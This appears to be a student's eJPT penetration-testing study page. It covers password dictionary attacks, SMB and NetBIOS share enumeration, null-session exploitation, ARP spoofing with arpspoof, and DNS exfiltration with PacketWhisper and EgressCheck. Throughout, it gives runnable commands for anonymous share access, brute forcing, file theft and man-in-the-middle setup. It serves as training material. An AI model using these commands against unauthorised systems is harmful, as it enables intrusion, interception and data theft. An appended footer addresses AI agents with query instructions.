# 📶Network Attacks

## 🔓Authentication Cracking

Brute Force mostly is never used hence why we focus on online Dictionary attacks.

One Helpful tool is Hydra:

{% content-ref url="/pages/-Mgm3U61ZykaQpW8CbBA" %}
[🐲Hydra](/shifrablog/tools/hydra.md)
{% endcontent-ref %}

hence why you need a really good set of password lists:

* [SecLis](https://github.com/danielmiessler/SecLists)[ts](https://github.com/danielmiessler/SecLists)
* [wiki skullsecuity](https://wiki.skullsecurity.org/index.php/Passwords)

## 👁‍🗨Windows Shares

[NetBIOS ](https://networkencyclopedia.com/netbios/)can provide when querying a computer following info:

* Host name.
* NetBIOS name. (via UDP)
* Domain.
* Network Shares.

 \[pre WinXP] NetBIOS is a **non-routable OSI Session Layer 5 Protocol** and a service that allows applications on computers to communicate with one another over a local area network (LAN). \
\- Today we have NBT (NetBIOS over TCP/IP) now we can route.

![Structure of NetBIOS.](/files/-MgmVInF3cIWQ31yy9XE)

{% hint style="info" %}
[Review SMB vs NetBIOS/NBT here.](https://superuser.com/questions/694469/difference-between-netbios-and-smb)\
Hint: *SMB* **does rely** on NetBIOS for communication with devices that *do not support direct hosting of SMB over TCP/IP*.

*NetBIOS* is completely independent from *SMB*. It is an API that SMB, and other technologies can use, so NetBIOS has no dependency to SMB.
{% endhint %}

### test your own PC shares:

```
\\localhost\admin$
```

```
\\localhost\d$
```

type it in path input in the File explorer.

![UNC paths](/files/Au30buxFY5t2agi8dvoo)

![Admin shares](/files/1JHkq952eC1g2PEXR47U)

### Null Sessions

**Null session attack:** exploit a vulnerability within [Windows  Administrative Share](https://en.wikipedia.org/wiki/Administrative_share) (which can't be deleted but can have auth.) this allows an attacker to connect to a local/remote share without authentication.

#### steps to attack:

1. Enumerate Windows Shares.
2. Check for Null Sessions.
3. Exploit Null Session.

#### 1- To Enumerate we have the following tools:

* **NBTStat** (Win command tool display info about target).

To know if file sharing is Up and runing:

```
nbtstat -A <IP>
```

![<20> means  file sharing service is up/runing.](/files/-Mgp9TRdy3-pmAkYkLH4)

* **NET VIEW**:(Win enum) after knowing it's running time to enum the shares.

```
NET VIEW <IP>
```

![](/files/-MgpAaWxJseivflABkIe)

* **Nmblookup:** (Linux Enum) provided by the [Samba suite](https://www.samba.org/).

```
nmblookup -A <Target_ip>
```

![we get the same result as NET VIEW](/files/-MgpB2_l9iKNGEGYXK0p)

* **Smbclient:** (Linux Enum) also available with [Samba Suite](https://www.samba.org/) to Enum Shares and other things.

```
smbclient -L //<IP>  -N
```

![-L: lookup, -N don't ask for password.](/files/-MgpBcCuA1bs4G2FZ9Ll)

{% hint style="warning" %}
Notice SMBclient shows more results, Admin$ shares that were not shown by the other prev. tools.
{% endhint %}

#### 2- Checking for Null Session:

We will exploit the `IPC$` Administrative share by trying to connect without valid credentials.

```
NET USE \\<PI>\IPC$ '' /u:''
```

> this tells Windowds to conn. to IPC$ with empty Username/Password.\
> \\\\\<IP>\IPC$ following the [UNC path ](https://www.lifewire.com/unc-universal-naming-convention-818230)standard.

same thing with **SMBclient**:

```
smbclient //<IP>/IPC$ -N
smbclient //<IP>/C$ -N
```

#### 3- Exploiting Null Sessions:

can be done also the same **NET** command but we will use Win/Linux tools to Automate.

* [ENUM](https://packetstormsecurity.com/search/?q=win32+enum\&s=files):  (Win tool, must download it)  enumerate Admin shares as well.

```
enum -S <IP> //enum shares
enum -U <IP> //enum users
enum -P <IP> //check password policy
```

{% hint style="info" %}
Checking password policy before running Auth Attack lets you fine-tune tools to:\
\- Prevent accounts locking.\
\- prevents false positives.\
\- choose your Dict/BruteForce config. (knowing min/max length of pass)
{% endhint %}

* [Winfo](https://packetstormsecurity.com/search/?q=winfo\&s=files): another Win tool to attack null sessions.

```
winfo <IP> -n
```

> -n tell the tool to use null sessions.

### Check for Null Sessions on Linux:

* [Enum4linux](https://tools.kali.org/information-gathering/enum4linux#:~:text=Enum4linux%20is%20a%20tool%20for,%2C%20rpclient%2C%20net%20and%20nmblookup.):  Linux PERL script that can do the prev. two tools + more.

```
enum4linux -U -o <IP>
```

> get -U user list & -o OS info for IP target.

**to carry all the 3 phases:**

```
enum4linux -n <IP> //check for open shares with <20> flag

enum4linux -P <IP> //enum pass policy

enum4linux -S <IP> //what target machine is sharing(Dir,files..etc).
enum4linux -s /usr/share/enum4linux/share-list.txt <IP> //bruteforce to check shares

enum4linux -a <IP> //do all the prev. command at once+ extra info
```

* **samrdump.py**: comes with kali does the same thing.  (gives extra info)

```
cd /Desktop/Tools_from_eJPT/Impacket/impacket-master/examples
python3 samrdump.py <IP>
```

* Nmap: can also do the same thing after knowing shares running.

```
nmap -script=smb-enum-shares <IP> //get shares
nmap -script=smb-enum-users <IP> //get users
nmap -script=smb-brute <IP> //brute force Username/pass
```

* smbclient : Access the share:

```
smbclient -L WORKGROUP -I <IP> -N -U "" //get list of shares

smbclient \\\\<IP>\\<share> -N //access a share

get <file> <location_in_your_PC>  //download a certian file while inside smb: \>
```

{% hint style="info" %}
Great SMB Enumeration tutorial full of tools.

<https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/>
{% endhint %}

## 💀ARP Poising

**happen when:** Attacker Send gratuitous ARP relies (ARP replies without actually asking) to the target thus changing the ARP cache for all victims so they forward the packet to the attacker.\
Then attacker can alter/forward the packet which means attacker now got Man-In-The-Middle Attack.

**Dsniff**: collection of tools for network auditing and Pen Testing.\
it includes **arpspoof.** install it:

```
sudo apt install dsniff
```

### Before running must transfer, Linux box into a router by enabling Linux Kernal IP Forwarding:

```
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward //when zsh/bash: permission denied
```

### Then you can run arpspoof:

```
arpspoof -i <interface> -t <server_IP> -r <host_IP>
```

> -i: NIC to use eth0 or tap0..etc\
> taget/host are victim IP (you want to be in middle of these two)

### Then on the running Wireshark Analyze the traffic.

## Metasploit

{% content-ref url="/pages/-Mgq1k-fJB1oO5w-K-P6" %}
[🔬Metasploit](/shifrablog/tools/metasploit.md)
{% endcontent-ref %}

## DNS Exfiltration

Tools:

* [Packe](https://github.com/TryCatchHCF/PacketWhisper)[tWhisper: ](https://github.com/TryCatchHCF/PacketWhisper)Exif Data using text-based Steganography via DNS.
* [EgressChec](https://labs.f-secure.com/archive/egress-checking/)[k Framework](https://labs.f-secure.com/archive/egress-checking/): check for the open outbound port.

{% hint style="info" %}
&#x20;Egress filtering (aka outbound filtering): **controls the traffic that is attempting to leave the network**. Before an outbound connection is allowed, it has to pass the filter's rules (i.e. policies).
{% endhint %}

### PacketWhisper:

to use the tool:

1. you have to run it inside the Target machine providing the file you would like to stealthy steal/exif. (this generates DNS queries).
2. In your machine capture the DNS queries with Wireshark/tcpdump (better)&#x20;
3. run the tool in your machine this time againts the captured pcap file to get the stolen file.

### EgressCheck:

#### To use:

1. run the tool in your machine with appropriate commands and generate the command for the target shell \[ex: powershell-cmd] it will give you a file to run on the target \[ex: .batch for windows].
2. capture traffic:

   ```
   tcpdump -n -u -w -i any /tmp/file.pcap
   ```
3. Run the generated file in the target machine. (or use the outputted command).
4. when egress is done close tcpdump and run:

   ```
   tshark -r /tmp/file.pcap -eip.proto -eip.src -etcp.dstport tcp > /tmp/egress.tcp
   ```

   print results:

   ```
   cat /tmp/egress.tcp | awk '{ print $3 }' | xargs echo | sed 's/ /,/g'
   cat /tmp/egress.tcp | awk '{ print $2,":",$3 }' | sed 's/ //g'

   ```

\`&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mo-ela.gitbook.io/shifrablog/pentesting/ejpt/network-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.